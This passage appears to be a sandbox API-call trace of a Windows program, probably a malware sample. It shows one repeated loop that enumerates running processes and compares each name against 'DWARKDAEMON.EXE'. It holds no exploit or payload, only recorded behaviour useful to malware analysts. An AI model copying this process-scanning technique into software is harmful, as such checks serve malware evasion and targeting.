th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.505] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.505] lstrlenW (lpString="svchost.exe") returned 11 [0163.505] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.505] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.505] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.505] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") 
returned="audiodg.exe" [0163.505] lstrlenW (lpString="audiodg.exe") returned 11 [0163.505] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.505] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.505] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.506] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.506] lstrlenW (lpString="svchost.exe") returned 11 [0163.506] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.506] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.506] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.507] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.507] lstrlenW (lpString="svchost.exe") returned 11 [0163.507] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.507] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.507] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.507] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" 
[0163.507] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.508] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.508] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.508] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.508] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.508] lstrlenW (lpString="svchost.exe") returned 11 [0163.508] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.508] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.508] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.509] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.509] lstrlenW (lpString="taskhost.exe") returned 12 [0163.509] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.509] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.509] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.510] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.510] lstrlenW 
(lpString="taskeng.exe") returned 11 [0163.510] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.510] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.510] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.510] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.510] lstrlenW (lpString="dwm.exe") returned 7 [0163.510] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.510] lstrcmpW (lpString1="DWM.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.510] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.511] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.511] lstrlenW (lpString="explorer.exe") returned 12 [0163.511] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.511] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.511] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.512] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.512] lstrlenW (lpString="taskeng.exe") returned 11 [0163.512] 
CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.512] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.512] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.513] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.513] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.513] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.513] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.513] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.513] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.513] lstrlenW (lpString="taskhost.exe") returned 12 [0163.513] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.513] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.513] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.514] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.514] lstrlenW (lpString="calls ccd 
copyright.exe") returned 23 [0163.514] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.514] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.514] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.515] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.515] lstrlenW (lpString="tri.exe") returned 7 [0163.515] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.515] lstrcmpW (lpString1="TRI.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.515] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.516] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.516] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.516] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.516] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.517] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.517] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: 
lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.517] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.517] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.517] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.517] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.518] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.518] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.518] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.518] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.518] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.519] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.519] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.519] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.519] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.519] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.519] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.519] lstrlenW (lpString="isolation.exe") returned 13 [0163.519] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.519] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.519] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.520] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.520] lstrlenW (lpString="abc.exe") returned 7 [0163.520] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.520] lstrcmpW (lpString1="ABC.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.520] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.521] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.521] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.521] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.521] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", 
lpString2="DWARKDAEMON.EXE") returned 1 [0163.521] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.521] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.522] lstrlenW (lpString="english_performing.exe") returned 22 [0163.522] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.522] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.522] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.522] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.522] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.522] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.522] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.522] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.523] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.523] lstrlenW (lpString="c-weird-baskets.exe") returned 19 
[0163.523] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.523] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.523] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.524] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.524] lstrlenW (lpString="volume.exe") returned 10 [0163.524] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.524] lstrcmpW (lpString1="VOLUME.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.524] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.524] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.524] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.524] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.524] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.524] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.525] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") 
returned="objectives-bailey-audit.exe" [0163.525] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.525] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.525] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.525] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.526] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.526] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.526] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.526] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.526] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.526] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.527] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.527] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.527] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.527] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.527] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.527] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.527] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.527] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.527] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.528] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.528] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.528] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.528] lstrcmpW (lpString1="EXCEL.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.528] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.529] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.529] lstrlenW (lpString="svchost.exe") returned 11 [0163.529] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.529] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.529] Process32NextW 
(in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.529] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.529] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.529] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.529] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.530] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.530] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.530] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.530] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.530] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.530] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.533] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.533] lstrlenW (lpString="svchost.exe") returned 11 [0163.533] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.533] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.533] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | 
